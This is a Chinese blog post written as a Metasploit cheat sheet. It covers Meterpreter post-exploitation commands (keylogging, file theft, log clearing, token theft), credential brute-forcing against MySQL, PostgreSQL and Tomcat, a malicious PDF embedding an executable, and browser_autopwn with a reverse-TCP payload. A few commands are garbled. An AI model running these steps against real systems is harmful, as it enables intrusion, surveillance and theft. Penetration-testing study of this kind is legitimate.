zoukankan      html  css  js  c++  java
  • msf、armitage

    msfconsole的命令:
    msfconsole
    use module :这个命令允许你开始配置所选择的模块。
    set optionname module :这个命令允许你为指定的模块配置不同的选项。
    exploit :这个命令启动漏洞利用模块
    run :这个命令启动非漏洞利用模块。
    search module :这个命令允许你搜索独立模块。
    help
    exit


    msfcli的命令:
    msfcli
    msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
    msf -h


    Meterpreter 执行实际的载荷分发和漏洞利用工作:
    background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
    download :这个命令允许你从受害者机器中下载文件。
    upload :这个命令允许你向受害者机器上传文件。
    execute :这个命令允许你在受害者机器上运行命令。
    shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
    session -i :这个命令允许你在会话之间切换。


    开始记录目标系统中用户的击键顺序:
    keyscan_start

    转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
    keyscan_dump

    停止记录目标系统中用户的击键顺序。
    keyscan_stop

    删除目标系统中的文件。
    del exploited.docx

    清除目标系统中的事件日志。
    clearav

    展示运行进程的列表。
    ps

    杀掉受害者系统的指定进程,使用 kill [pid] 语法。
    kill 6353

    尝试偷取目标系统上的模拟令牌。
    steal_token


    msfconsole mysql
    use auxiliary/scanner/mysql/mysql_login
    show options
    set RHOST 192.168.10.111
    set user_file /root/Desktop/usernames.txt
    set pass_file /root/Desktop/passwords.txt
    exploit


    msfconsole postgresql
    use auxiliary/scanner/mysql/postgres_login
    show options
    set RHOST 192.168.10.111
    set user_file /root/Desktop/usernames.txt
    set pass_file /root/Desktop/passwords.txt
    exploit


    msfconsole tomcat
    use auxiliary/scanner/http/tomcat_mgr_login
    show options
    PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
    USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
    set RHOSTS 192.168.10.111
    set RPORT 8180
    exploit


    msfconsole
    msfconsole pdf
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    show options
    set FILENAME evildocument.pdf
    set INFILENAME /root/Desktop/willie.pdf
    exploit


    实现 browser_autopwn:
    浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
    们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
    利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
    msfconsole autopwn
    use auxiliary/server/browser_autopwn
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.109
    set URIPATH "filetypes"
    exploit
    Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
    当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
    如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
    session –I 1

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    cpu进程调度---RT Throttling【转】
    Google 开发新的开源系统 Fuchsia
    牛人博客!!!各大招聘网站信息实时查询浏览【转】
    ARM多核处理器启动过程分析【转】
    Linux 下多核CPU知识【转】
    Android的init过程(二):初始化语言(init.rc)解析【转】
    In_interrupt( ) 和In_irq( )【转】
    jiffies溢出与时间先后比较-time_after,time_before【转】
    Linux系统的中断、系统调用和调度概述【转】
    linux中断的上半部和下半部 【转】
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6393910.html
Copyright © 2011-2022 走看看